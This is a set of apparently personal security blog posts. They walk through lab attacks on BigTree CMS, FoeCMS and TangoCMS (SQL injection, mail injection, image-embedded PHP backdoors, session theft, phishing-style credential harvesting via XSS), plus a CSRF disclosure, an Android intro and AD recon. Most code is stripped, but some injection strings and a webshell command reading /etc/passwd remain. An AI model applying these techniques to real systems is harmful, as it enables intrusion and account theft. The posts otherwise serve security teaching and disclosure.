All of this increased the size of the payload from 1008 to 1188 bytes but that's still a lot smaller than the 1536 bytes of the previous exploit.
Exploiting The Application
So now we have all the required information to make a working exploit.
You can see my full notes here.
And the full exploit here.
As normal we run the vulnerable application:
1 |
|
Start listening with nc:
1 |
|
Launch the exploit:
1 |
|
Then if you look at the terminal windows running nc:
1 2 3 4 5 6 7 |
|
PWNED!! :-D
Conclusion
I know we didn't save a huge amount of space with this exploit (only 348 bytes), that might be enough to bypass any space restrictions.
Also if we had more/different gadgets, which is certainly possible with a different application, we might have been capable of saving a lot more space.
The main point of this post was the demonstrate some reasonably advanced ROP techniques and suggest possibilities for improving an exploit where ROP is required.
Happy Hacking :-)
A Web Hack
So the other day I ran across this.
Its a virtualbox VM containing load of web applications vulnerable to SQL injection put together by Pentester Academy.
I've been a member of Pentester Academy from the very start (as well as having done a few of Securitytube's earlier courses), which I highly recommend, but I've never seen this VM.
In fact there are 2 VM's on this account that I've never seen before, I've seen both the arbirary file upload VM and the command injection VM (which I done a post about 1 of the applications here) but both the SQL injection and XSS/CRSF I'd never seen before.
So I decided to give it a go.
I've done a few of the challenges and they have been very fun so far but there is 1 I'd like to share.
With these challenges I'm trying to approach them from a web analysis point of view, so I'm looking for many different vulnerablities and not just to SQL injection.
Also I'm not using any public information about the applications to attack them and I'm doing the attacks from a completely blind approach (with no access to the machine or source code at all).
The Vulnerable App
The application I will be demonstrating is Bigtree-CMS.
Its an old version of the application and I won't be downloading the source and looking at that I will just be pretending that the source code is unavaliable.
So if we download the VM, import it into virtualbox boot it up and visit:
http://[ip]/BigTree-CMS/
We are 302 redirected and see the following:
Most likely something has gone wrong here, its worth noting here that I always setup the web browser that I am using to analyse a website to go through burp suite, so let's look at burp to see what happened:
So as you can see the application is pointing to itself via localhost meaning it is using absolute links and not relative. This is probably because the application was setup using localhost as its name.
We'll have to use burp to rewrite all of the responses:
Now if we reload the page we get:
A Quick Analysis
So we have the application working normally, its time to explore it.
There is only 1 thing we know for certain about this application, and that is that it is vulnerable to an SQL injection.
If you click on the Glossary link in the top right of the homepage, you get redirected to the following url:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid/
This suggests that the site is using REST-style urls, which basically means the values from normal url query paramerters are integrated into the url itself. So, in regards to a search function, instead of this url:
http://[website]/[path]?search=foobar
You would have:
http://[website]/[path]/search/foobar
What this means is parts of the url can se treated as a parameter would be treated.
Also, after putting in the following url:
http://[ip]/BigTree-CMS/site/index.php/admin/
We get redirected to the following page:
I tried looking for SQL injections into the login but it appeared to be reasonably secure.
Also there doesn't appear to be a signup link anywhere and going to:
http://[ip]/BigTree-CMS/site/index.php/admin/signup/
Redirects to the login page, and:
http://[ip]/BigTree-CMS/site/index.php/signup/
404's
An SQL Injection
I'm going to rush through this section because there is a lot of trial and error involved in determining the database and building; and refining the injection attack but I go into that in much more detail in my SQL Injections post.
So my focus turned to the url parameters. I first tried:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid%27/
But got redirected back to:
http://[ip]/BigTree-CMS/site/index.php/glossary/acid/
So I tried the quote next to glossary and this happened:
This is very helpful, it actually tells us the full query we are injecting into:
Unfortunately it doesn't allow us to retrieve arbitrary information to the screen (at least that I could find) or even tell us the number of columns that the original query returns.
Obviously we can figure out the number of columns is 3 using SQL's ORDER BY because the lowest number to fail is:
http://[ip]/BigTree-CMS/site/index.php/glossary%27%20order%20by%204%20--%20/acid/
The easiest method I found of exploiting this was by using a time-based approach, I assume you could use a content-based approach by way of a forced error or ensuring no records were returned (and getting returned a 404) but I'm not on a time constraint so I wasn't too bothered.
So I first wrote a script to give me the database name (or at least a database name) and 1 of its table names:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
Believe it or not, this is how I write scripts, stright url encoded (mostly) and normally have the string on 1 line (I've put it on multiple lines here for readability).
For those of you not as used to url encoding and SQL, here is what I'm injecting:
' union select null,null,case when ascii(substr((select concat(table_schema,' : ',table_name) from information_schema.tables where table_schema!='information_schema' limit 1),[position],1))=[character ascii value] then sleep(3) else 1 end --
Then I'm checking to see if the response took longer than 3 seconds (we could increase this based on how quickly the website normally takes to respond).
I'm sending it through the proxy at 127.0.0.1:8080
(which is burp) so that burp can rewrite the relevant content and headers automatically, even though it shouldn't make a difference I thought it wouldn't hurt.
When run we get this:
1 2 |
|
So we now have the database name and a table name from it, this is likely not the table we are really interested in though so another script is required to find out the rest of the table names:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
This is almost the same as the last script except I'm using GROUP_CONCAT to concatenate all the records and I'm excluding the bigtree_404s table.
Running it you get:
1 2 3 4 5 6 7 8 9 |
|
Obviously the table of most interest to us here is bigtree_users, now we need to figure out the column names:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
|
Again this is very similar to the last 2 script, except now we are looking at the columns table of the information_schema database.
Running this you get:
1 2 3 |
|
Now we have enough information to get the account details, I've chosen a few interesting columns to print:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
|
Running this we get:
1 2 |
|
Cracking The Hash
So we have the details for 1 user account (the admin account in this case), now we should try to crack it.
For this I'll use john the ripper.
Let's try just a normal brute force for a while and if that takes too long we'll try a dictionary attack or something:
1 2 3 4 5 6 7 |
|
Luckily this was a very insecure password and the hash was cracked very quickly using a brute force (this is another security issue, allowing weak passwords).
Some More Poking About
After logging in as the [email protected] user, you should see this:
Clicking around there are a number of interesting things, like a stored XSS in the footer social links, so by creating a footer link like this:
And while it doesn't run when viewed in the admin panel (bare in mind that the subtitle field is likely vulnerable too to make this less obvious):
When any normal page is visited, the attack is run:
And looking at this response in burp, we can see where our attack payload is put:
But, more interestingly, in Modules -> Features -> Add Feature I have the ability to upload pictures:
Unrestricted File Upload Vulnerability
So, first I just upload a normal image file.
For this I'm going to use this image (credits to Majonez who created it).
I just saved it with the filename one.jpg, select it in the form, put the title as one, click Save & Publish and I get this:
Its asking to crop the image, which probably means there is some sort of analysis done on the image.
Full Path Disclosure
At this point I decided to try to upload a plain PHP backdoor, so I clicked on the View Features button and was presented with this:
Obviously because I started uploading the image it created the feature but as I didn't crop it it hasn't finished creating the feature, this is a logic flaw in the application which may or may not lead to a security vulnerability.
Let's look at this feature:
So the logic flaw lead to a full path disclosure vulnerability, really the developers should have waited until all of the steps of creating the feature had completed before creating the feature, discarding any half created features after a timeout, also this error should be caught and dealt with gracefully.
Back To The File Upload
Anyway, we can continue by trying to upload the following PHP file:
1 |
|
This is just a very simple PHP backdoor which will take an input in the cmd argument of a query string of a GET request.
Trying to upload the file in the same manner as I did the image, I get:
The image size is 1 issue but it also says that it isn't an image file, this could just be a content type check or it could also check the file extension.
Hopefully we can beat both of these checks by using a real image but chaning the file extension to .php.
Firstly I will change the size to 1400x625, which is the size it wanted to crop the image to, I done this in GIMP in Image -> Scale Image...:
I saved this to two.jpg, renamed it to two.php and attempted the upload again:
So its uploaded successfully!
Right clicking on the new image and clicking Copy Image Location gives us the following url:
http://[ip]/BigTree-CMS/site/files/features/t_two.php
In that folder there is currently the following files:
Obviously, these will not work as PHP files yet because they contain no actual PHP code, we will sort that out in a minute, but we can see that both two.php and xlrg_two.php is very likely our original file, whereas t_two.php is a different version created by the application.
So I added some PHP code into the comments section of the image, using GIMP again, going to File -> Export..., putting three.jpg as the name and clicking Export:
Again, change the file extension from .jpg to .php and do the upload.
After, visit the following url to see if it has worked:
http://[ip]/BigTree-CMS/site/files/features/three.php?cmd=cat%20/etc/passwd
Obviously that didn't work :-(
After, a lot of trial and error, I decided to try search for other instances of <? (the opening of PHP code in PHP files) using the hex editor HxD:
There were 2 other instances (apart from the 1 in the commands section which contains my PHP code), here is the comment section in HxD:
I changed one of the values so that there were no other instances and tried again:
Clearly it didn't work, but at least now its not producing an error (its returning the actual content of the file instead of nothing which means those 2 extra <? where a problem).
I thought that maybe the application was stripping the comment section, so I used HxD again to insert my PHP code directly into the middle of the actual image:
Trying this file, gives us:
I now have the ability to run OS commands on the webserver.
PWNED!!! :-D
Conclusion
I think this post illustrates the different steps that might be involved in a full attack against a web application.
As you can see, there could be many vulnerabilities involved (I found at least 6 vulnerabilities in this application), each getting you closer and closer to the ultimate goal of RCE (remote code execution).
There will always be a reasonable level of trial and error when figuring out how to exploit most vulnerabilities, in all of the simplist cases, so a lot of patience is required to be successful!
Happy Hacking :-)
Further Reading
The Web Application Hackers Handbook by Dafydd Stuttard and Marcus Pinto (Here is the website that accompanies the book)
OWASP Testing Guide which can be viewed online or downloaded from here.
SQL Injection Attacks and Defense by Justin Clarke
Pentester Academy by Vivek Ramachandran has a number of relevant courses (WAP, Challenges and Python)
Hacking FoeCMS
Today I decided to look at FoeCMS.
There are many known vulnerabilities for the older version of the application (version 1.6.5) but none that I could find for the current version (on Github).
I plan to develop a full attack against this application while looking for vulnerabilities.
Setting Up The App
I setup the application on Debian/Apache/PHP5/MySQL.
Its pretty easy to setup, just pull the code from github with:
git clone https://github.com/themarioga/FoeCMS.git
Place it in the webroot (or subfolder if you wish), set the permissions:
chown -R www-data:www-data /var/www
Then create the database and database user:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
Now its just a matter of finishing the installation through the browser, visiting the site we get directed to this:
These are the setting I'm using. Notice how only guests with intitations can register.
There is 1 thing left to do, remove or rename the install directory:
root@foecms:~# mv /var/www/install /var/www/install.old
Now that installation is finished when we visit the webpage we should be presented with this:
Some Vulnerabilities
Now we just need to use the application a bit and see what we can find.
Some SQL Injections
The first thing I done is change the language to English (by clicking the little union jack flag on the top of the page), this sends the following request:
http://foecms/index.php?i=2
Which sets the following cookie:
foecms_lang=2; expires=Mon, 09-Mar-2015 11:05:12 GMT
Here we already have 2 possible attack vectors (the value of the i parameter to index.php and the value of the foecms_lang cookie).
In fact both of these are vulnerable to SQL Injection, you can see this if you send this request:
http://foecms/index.php?i=2%27
Here is the full response:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
And now if you visit any page, you get the same response body:
1 |
|
To get rid of this error we need to remove the %27 from the cookie, I prefer Cookie Manager+ for this purpose:
And delete the PHPSESSID cookie:
Continuing to play about with the application I come across another page with an SQL injection vulnerability:
And an XSS is also possible:
I won't explain how to exploit these SQL injection vulnerabilities anymore, I've already done that pretty extensively in previous posts.
A Mail Injection Vulnerability
So Let's move on.
Clicking on Contact at the bottom of the site give you this, rather poorly written, page:
After putting in some arbitrary information, I set Burp to intercept the request, capture it and insert the following into the email address field:
%0aBCC:[email protected]
Here I am trying to inject another email address to send the email to:
Note: for the web application to be able to send emails externally (on the setup I have running) you need to enable it by running the following command and chosing Internet Site:
root@foecms:~# dpkg-reconfigure exim4-config
Checking the mailbox at mailinators website, we can see the email has been received:
Unfortunately the subject didn't get sent correctly but with a bit of testing I'm sure this could be refined to a more convincing email, and then this could be used as an email proxy to send out spam/phishing email.
A Logic Flaw
When trying to register, by visiting:
http://foecms/register.php
We get redirected to the following error:
This is because I set registration to invite only during installation.
After some testing I decided to add the cookie foecms_userid:
I did this because of the foecms_lang cookie. I then clicked on the link to the test post, which sent this request:
http://foecms/viewitem.php?i=1
I got an error message saying No items found and then redirected to the homepage again, where I see this:
So it appears that I have been logged in.
We also now have the extra User Control Panel button, which gives us:
It looks like even though we're logged in, we're not logged in as anyone in particular, which means we have limited functionailty.
For instance, we can't change any account details because our session doesn't appear to belong to an account.
Inviting Myself
I did, however, have access to the invitation page:
After sending an invitation we get this:
So it tells us the URL to visit. Here is the email that is received:
This email isn't really helpful but the application has already given us the registration URL.
The problem is when we visit it we get this:
Fixing The App
The problem we face here seems to be a problem in the application itself.
It doesn't seem to be prepending the prefix to the table name.
Obviously this would have been fixed on a production website so I just fixed this manually by editing /var/www/include/functions.php
, line 336, and changing it from:
1 |
|
And replacing it with this:
1 |
|
So I'm just hardcoding the prefix into the query, not the best fix but it will work for our purposes.
Now when we visit the registration page we get:
Obviously, if we want to create an account we probably want to give it a less obvious name but we are only testing here.
Here is the welcome email you receive after registration:
The main thing we can get from this is that our email is sent in plain text and its encrypted as MD5.
XSS Via SQL Injection
Actually, after this next vulnerability it might not have been necessary to create an account but the account will come in useful for testing it.
Now that we have an account we can try sending a message to it:
Logging into the new hacker acccount we can see we've received a new message:
But clicking on this message show us this (after some form of redirect):
Looking at the code in Burp we can see why this redirect happened:
But the message was displayed:
Now I did try a number of things to perform an XSS attack but was unable to.
But trying to send another message but with message' in the message box we get the following error:
Clearly we have another SQL injection vulnerability but this time in an INSERT statement.
The error tells us that we are injecting right at the end of the statement, so what we'll do is close off the current row and insert a new row, we'll also need to comment out anything after our injection.
So our injection should look as follows:
message'),([our new record]); --
The problem we've got is we don't know the number of columns or their types used in the statement.
We could use 1 of the other SQL injections to query the information_schema to get that information but we can use a different method.
Because NULL can be typecast to any type in MySQL, we can just keep increasing the number of NULL's until we no longer get an error.
There will likely be at least 4 columns (from, to, title and message), so lets start there by sending:
message'),(null,null,null,null); --
We got another error!
Looking at the request in Burp we can see why:
It seems the browser has stripped the last space from the message, which on other DBMSs it wouldn't be a problem but on MySQL it is, so we will use Burp's Repeater to do this injection:
Now we can edit the request in a lot more detail and sending it is successful:
This means there there are only 4 fields (assumably form, to, title and message).
Obviously, this isn't helpful because we've not filled in any of the fields so the message will not actually go to anyone.
The problem is that we don't know the types of the fields (at least the from and to fields) or the positions of any of them other than the message field.
In this case a bit of trial and error is normally required but luckily the first thing I tried turned out to be fruitful:
Hewre I am just injecting (1,2,3,4)
as our new record.
After logging into the hacker account and checking the messages, we have recieved a message from admin with the title 3:
As its showing up as being from admin its likely that the first field is the from field and its using the userid instead of the username.
Also, this means the hacker user likely has a userid of 2.
Clicking on the message, we get:
So it no longer redirects, what that probably means is that because we were sending the message from a nonexistent account the redirect happens but when its sent from a valid userid the redirect doesn't happen.
So now we can test sending an XSS payload:
Viewing this message:
So some sanitization has been done.
We can use MySQL's CHAR and CONCAT functions to avoid using < or >.
We do this by putting the following in the message field:
1 |
|
And viewing this message:
Success!
Now we just have to craft a payload that we can use to steal the admin users session cookies (as the cookies aren't protected with the httponly flag its possible to do this using javascript).
One way of doing that is the following:
1 2 3 4 5 6 |
|
Here I'm just sending a message to the account I created with the cookies as the message.
I could have just sent to cookie in a HTTP request to any server on the internet and got the cookie that way but I thought this would be fun :-)
Viewing this with firebug we can see that the request was made:
However, as you can see here (from the response in firebug) the request failed:
This was only because the application doesn't allow sending messages to yourself, when we attack the admin account it will be sending the message to the hacker account.
I think its time to test the attack on the admin:
Notice above that I substituted any instance of & with char(38), this was because the application was converting & for & which broke the attack.
Now logging in as admin (with firebug running so we can see the request):
Now if we check the hacker users messages (obviously from a different browser so we don't expire the admin's session):
Finding RCE
We can now hijack the admin's session, there are a number of ways to do this, all we need to do is add the PHPSESSID cookie to our browser.
This time I'm going to do that by setting Burp as the proxy and intercepting the response from the server to add a Set-Cookie header:
Now if we reload the homepage we are logged into the admin account.
An Unrestricted File Upload Vulnerability
There is now another button on the top of the site Admin's Panel, looking through that a bit give us a good option for a file upload vulnerability:
This seemed to work fine, we just need to figure out where it uploaded to.
Visiting the homepage showed a new section with a broken image (assumably the image that I didn't upload when uploading my backdoor:
Right clicking and copying the link to that broken image gave me the following link:
http://foecms/storecontent/image/test/cmd
Browsing about in this storecontent directory led me to where the actual backdoor had been uploaded:
And now we can run commands on the server:
PWNED!!! :-D
Conclusion
As you can see, there can be a lot of steps involved in attacking a web application, especially if you want to make the most out of the attack.
Yes, I could have used the first SQL injection attack to find the admin account details and crack the password (as in my previous post) but firstly, if the admin accounts password is sufficiently secure and encrypted then it might not be feasible to crack it, and secondly I wanted to demonstrate another of the many ways a web application could be comprimised.
Happy Hacking :-)
Further Reading
I'll advise the exact same further reading as in my previous post because they are all still relevant.
CSRF In BigTree CMS
Yesterday I found a cross site request forgery (CSRF) vulnerability in the latest version of BigTree CMS (at the time of writing version 1.4.5).
This is a little explaination of the vulnerability and how to exploit it.
The Vulnerability
The vulnerability is in the account settings request, which is used to change the account name, company and password.
A normal request looks like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
The vulnerability exists in [BigTreeROOT]/core/admin/modules/users/profile/update.php
:
1 2 3 4 5 |
|
Here is clearly isn't doing any checks to prevent CSRF.
The Exploit
So exploiting this is very simple, you just have to lure someone who is already logged into the application is visit a page containing this code:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
The values here can be changed to anything, it just automatically issues a POST request to http:/bigtree/site/index.php/admin/users/profile/update/
with the following arguments:
name=admin&password=newpassword&company=foobar
Unfortunately it is reasonably intrusive because when loaded the victim will see this:
So the user will immediately know that their profile details might have changed.
The Fix
So I contacted Tim Buckingham (the lead developer for BigTree CMS) about this issue yesterday (on 7th March 2015) and he replied the next day informing me that he'd fixed the issue.
You can see the fix here.
The next full releases of BigTree CMS (4.1.6 and 4.0.10) should be out next week and will incorporate this fix.
Happy Hacking :-)
Update (07/04/2015): BigTree CMS have finally released the next version (4.2) that includes the fix, you can download the latest version from here.
Authenticated Stored XSS in TangoCMS
I decided to take a look at TangoCMS for vulnerabilities even though it has been discontinued.
To my surprise there wasn't a huge amount that I could find, I did, however, find an authenticated stored XSS vulnerability.
This post is the description of that vulnerability and how to exploit it.
The Vulnerability
The actual vulnerability exists in the article functionality.
While by default only the admin user is able to create new articles, it makes sense that other users would be given the permissions to create them.
There is some client side filtering going on that does HTML encoding, so if I create an article with the classic javascript alert payload:
What it actually sends is:
The relevant field contains:
1 |
|
If you URL decode this it is more clear:
1 2 |
|
So its HTML encoded the less than (<) and greater than (>) signs.
Fortunately this is very easy to beat by intecepting the request in burp and inserting our payload then:
Now if we visit the articles page the payload launches:
Exploitation
Even though we've clearly found an XSS vulnerability it is only avaliable to authenticated users who have the ability to create (or edit) articles.
On top of this, the session cookies that are used by the application aren't accessible to script code (they all have the HttpOnly flag set), as you can see when you login:
Because of all of this it isn't immediately obvious why this vulnerability is important at all, and a client could decide to ignore the vulnerability because of this, so I went about creating a decent POC payload that demonstrates the problem with this type of vulnerability.
I decided to create a credential harvesting exploit which hopefully would trick even the more security conscious users (obviously ignoring the ability to use BeEF, I like to show how to do things manually).
The main goal of this exploit is to be as stealthy as possible while stealing the credentials so we only want to attack currently logged in users and also we only want to attack each user once.
The first problem (attacking only logged in users) can be acheived by careful review of the client side source code:
Here you can see a div tag with the id sessionGreating and it contains an a tag whose innerHTML is the actual username (here the username is just user, really imaginative :-).
This obviously only shows to users that are currently logged in.
The fact that we can grab the username out of this helps us with the next part of our exploit.
To attack the user only once we will use localStorage, and by getting the username of the logged in user we can make sure that we still run our main payload for different users that use the same browser.
We can now build the start of our payload:
1 2 3 4 5 6 7 |
|
We could of course redirect any user that isn't logged in to the login screen but that would make it more noisy and I think it would be caught quicker.
At this point we know the user is logged in, we also know the username so we could target specific users if we wish but I will target all logged in users.
We could build the login page manually but it would be boring and hugely unnecessary.
The best way I can think of is by just using the real login page, to do this though we'll first need to log the user out, once logged out we can request the real login page:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
|
Now we have the contents of the login page in l.responseText.
Before we write this to the screen we need to first make a couple of changes.
We need to hook the onsubmit event of the login form, that way we can run a function which steals the username and password before submitting the form.
We also need to tell the user why the login page is being displayed, if we just log the user straight out with no explaination, that might raise more suspicion than if an explaination is given.
For the explaination I think I'll go with the Your session has expired, please login again message, but we want this to look as realistic as possible so we want to display it how normal error messages are displayed on the site.
We can check this by failing a login:
Looking at the source code for this:
We can see that the message is put right after the h1 that contains a innerHTML of Login right before the form, which is the only form on the page.
We can also see that its contained within a div tag with the id of eventmsgError and a calls of eventmsg, and then inside a p tag.
With all of this information we should be able to create our custom error message using javascript:
1 2 3 4 5 6 7 |
|
Obviously we can't use the normal document element for this but we can transform our responseText into a document object like this:
1 2 |
|
We need to hook the onsubmit event of the form but first we should replace the innerHTML of the document with our newly created login page:
1 |
|
Now we can hook the onsubmit event:
1 2 3 4 5 6 7 8 |
|
So after I steal the username and password and send it to my machine, I set the localStorage so that it doesn't run again for that user.
Obviously the URL that the username and password is sent to can be anything.
Lastly I want to implement 1 more thing that will make this attack look even more authentic.
I'm going to use pushState to change the URL that is shown in the address bar as the page is changed to the login page.
This will hopefully fool any user who is perceptive enough to look at the address bar to make sure they are on the login page.
Its worth baring in mind that this is only possible because the target URL is the same as the URL we are attacking from, it is not possible to do this for different domains:
1 2 |
|
The state object is irrelavent for our purposes and the second argument to pushState (the title) is actually ignored, but will be sorted by the HTML anyway.
Its worth noting that I tried the exploit as is and it didn't work, here is why it didn't work:
The sessionGreeting div tag that we are using to check if the user is logged in is after the script, and as the script gets run when it is first encountered instead of when the full document is loaded the element doesn't exist yet so it doesn't get past the first if statement.
We can fix this easily using a callback that triggers when the document has finished loading:
1 2 3 4 5 |
|
So now our full javascript payload can be created:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
|
I URL encoded all of this using Burp:
Copy the output of the Burp encoder, intercept the request while editing the article again and put the encoded payload inbetween script tags after the article:
At this point I setup a python server listening on another host and in my payload I had put the IP address of this host with the port 8000.
Then I logged out and logged in as the admin user, when I went to view the article, it showed for a second but then displayed this page:
Obviously if this had happened right after login it might look a little suspicious but the user might have just put it down to an application bug, especially as it wouldn't happen again.
After logging in again on this page I saw this on my terminal running the python server:
1 2 3 4 |
|
Now when viewing the article we see:
Obviously in a real attack we'd upload a less obvious article and probably a very interesting one that a lot of people would want to view.
Conclusion
Obviously the major issue here is the need to already have an account with article add/edit abilities but this could be achieved through phishing, brute forcing or just a malicious user.
But I hope this should demonstrate the need for XSS protection in every area of a web application.
It should also demonstrate a way in which accounts can by hijacked even without the ability to get password hashes and crack them or steal session cookies.
With a little imagination the sky is the limit!
Happy Hacking :-)
Android Basics
Hacking Android is a huge topic, you have the Linux kernel, native code applications and normal Android applications that run on top of the Dalvik VM, a huge attack surface with the wireless, bluetooth, USB, NFC and various other interfaces.
This post is going to be a very short introduction to the platform as well as introducing some very basic analysis techniques for analyzing an Android application.
For this post I will be using a HTC Desire HD running an unrooted Android 2.3.5, this is an old version of Android, running on an old device but it will be fine for the purposes of this post.
The host machine that I'll be using is running 64bit Gentoo running the Linux kernel version 4.0.5.
Setting Up The Environment
The first thing you need to do if you want to analyze an Android device is to install the SDK.
Depending on your system, you might need to install both the Android Studio as well as the platform tools, its important that you have the platform-tools directory because that is the directory that contains the adb binary.
adb is the Android Debug Bridge and it's used to do any sort of debugging of any android device. Without this application, debugging Android will be very difficult.
On my Windows computer this was installed to C:\Users\User\AppData\Local\Android\sdk\platform-tools.
On my Debian-based system it was installed to $HOME/Android/Sdk/platform-tools and on my Gentoo system it was installed to /usr/bin.
Where ever it is installed to, it's best to include this directory in your PATH variable so that you can run it with cd'ing to that directory or having to put the whole file path in every time.
This is optional but on Linux I've been unable to get adb to work with running it as root, instead of having to use sudo all the time I set the permissions to the adb binary to 4750
and the ownership to root:wheel
, this makes it a setuid binary and so will run with root permissions but only for users in the wheel group.
The permissions look as follows:
1 2 |
|
Exploring The System Using ADB
Firstly the Android device needs to be connected to the host machine using USB.
After that we need to enable USB debugging, on my test device the setting is in Settings->Applications->Development:
You will need to confirm this:
We can now use adb to get a shell on the Android device and take a look around, first let's check the version of the Linux kernel that it's running:
1 2 3 4 5 6 7 8 9 |
|
So as you can see it is, in fact, running Linux version 2.6.35 but in some sort of restricted environment.
Let's check to see some details of the user that we have been logged in as:
1 2 3 4 5 6 |
|
As you can see due to the restricted environment, the normal methods aren't working.
But there is an easy way to figure this out:
1 2 |
|
So that didn't work either, but there is a way to use grep on the output of these commands:
1 2 3 |
|
Here we can see we're running at the user shell. Also note that we can run the commands using adb but then pipe the output to applications running on our host system to sort through the data.
Knowing our username we can now see what shell we are running in:
1 2 3 4 |
|
So this is clearly a Linux system but its very different from most Linux systems, let's have a look at the directories under /:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
|
Again, some of these are familiar (like etc, proc, dev...) but directories like system, acct and app-cache are less familiar.
I'm not going to go through the whole of Android, the point of this section was to demonstrate that this is a Linux system but not 1 that will seem totally familiar with Linux admins.
There are, however, a couple of commands I want to mention here, firstly getprop:
1 2 3 4 5 |
|
Here I'm just using getprop
to show some information about the build version of Android but you can get a lot of information from this.
The other 1 is logcat, which is basically the system log:
1 2 3 4 5 6 7 8 9 10 11 |
|
Here I'm just outputing the last 8 lines of the log, as you can see it's an actual built in command into adb, but you can run logcat from inside the shell too.
logcat is very useful for debugging and well as showing some information disclosure vulnerabilities that might exist in an Android application, but we'll get to that a bit later :-)
Installing And Running The Challenge App
For the purposes of this post I created a little, very basic, challenge application, which you can download from here.
You can install the application using adb:
1 2 3 4 5 |
|
Now that the application is installed we can run it and have a look at what it does.
Starting the application shows us this:
Putting in some text in to the field and clicking on the Check Password button shows us this:
So its clear what we have to try and do here.
Android Applications
Android applications come in apk format, these are just Java archive file:
1 2 |
|
These are very similar to zip files and can be unzipped using the unzip utility:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
|
As you will see there are a lot of files in res/
, I've shortened it here.
One of the most important files is AndroidManifest.xml
, this contains the configuration of the application, including activity, intent and permissions declarations.
But as you can see this is some sort of binary file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
It's actually binary XML.
We can manually convert this to plain XML using something like AXMLPrinter2 but I'll show an easier way to look at this later.
Another important file is the classes.dex
file. This contains all of our Java code.
Most code that runs on Android applications, including most of the Android Framework, is Java, but instead of compiling to Java bytecode, it is compiled into Dalvik bytecode (and stored in .dex or .odex files).
Again, this could be manually decompiled back to Java using dex2jar and looked at using jd-gui but I'll show a better way of doing this too.
Doing A Very Basic Static Analysis
To end this post I'll crack this challenge while demonstrating a quick basic analysis of the apk file using a tool called androguard created by Anthony Desnos.
Androguard is a python toolset for analyzing apk files.
Its very easy to setup, providing you have python and git installed you just run:
1 |
|
This will create a directory in the current directory called androguard.
Now you just need to make sure you have the latest version of IPython installed, you can do that by running:
1 |
|
Now just cd to the androguard directory and you should see the following (or something very similar):
1 2 3 |
|
The tool we'll be using is androlyze.py
, we can start it by running:
1 2 3 |
|
Now we need to import our apk file:
1 2 3 |
|
Here we are using the dad decompiler, created by Geoffroy Gueguen, that comes with androguard and selecting the challenge apk file.
Now we can look at this application in more detail:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
|
As you can see this is a very basic application, but we can now see the contents of the AndroidManifest.xml file.
An activity is basically just a screen, or, to relate it to a web application, a page. The main activity is the first activity that is shown to the user.
Let's try to look at some of the code.
First we'll print the different methods which are part of the main activity:
1 2 3 4 5 6 7 8 9 10 |
|
The first place to look here is the onCreate method.
This is the code that gets run when the application first starts:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
We can see here that the actual interface for this application is created dynamically using Java.
As you can see from line 20, this main class is registered as the onClickListener for the button that checks the value of the password.
This means that when you press the Check Password button, it will run the onClick method in this class.
So let's look at the code for that method:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
So here it's obvious that the password is supersecurepassword.
We can check that on the application itself:
It was fine this time but there are times when a decompilation will not be enough, the decompiler will not be able to recreate the source code well enough to get the right result.
In these cases you can use the disassembler like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
|
Here we can see the actual dalvik disassembly and decompile it ourself if need be.
Conclusion
So we've learnt a bit about Android and how we can begin to analyze the system more.
We have been introduced to the basic layout of Android and Android applications, as well as a few tools that can be used to look a little closer at them.
Hopefully this blog post has done a decent job of introducing the basics of Android and given ideas for further exploration.
Further Reading
Android Hacker's Handbook by Joshua J. Drake, Zach Lanier, Collin Mulliner, Pau Oliva Fora, Stephen A. Ridley, Georg Wicherski
Active Directory Reconnaissence - Part 1
So it's been a long time since I've blogged anything but I've finally ported my blog from Octopress and am now in a better position to update it.
For a while now I've been focusing on learning as much as possible about perfomring infrastructure security assessments and particularly Active Directory (AD), so it makes sense to start creating some blog posts regarding that.
AD is a highly complex database used to protect the rest of the infrastructure by providing methods to restrict access to rsources and segregate resources from each other. However, partly due to it's complexity and partly due to backwards compatibility, it's very common for insecure configurations to be in place on corporate networks. Due to this and the fact that it is usually used to provide access to huge sections of the infrastructure, it's a high value target to attack.
In this post, I'll demonstrate some basic reconnaissence that might be possible from a completely unauthenticated position on the infrastructure.
Lab Configuration
The lab configuration is simple, as shown below:
The main thing here is that the IP address of the domain controller is 192.168.73.20.
Basic Scanning
The first step would be to perform a port scan of the target system. Nmap is a common choice for a port scan and for good reason, Nmap has tons of options and is capable of much more than simple port scanning.
A basic port scan using Nmap of the top 1000 TCP ports is shown:
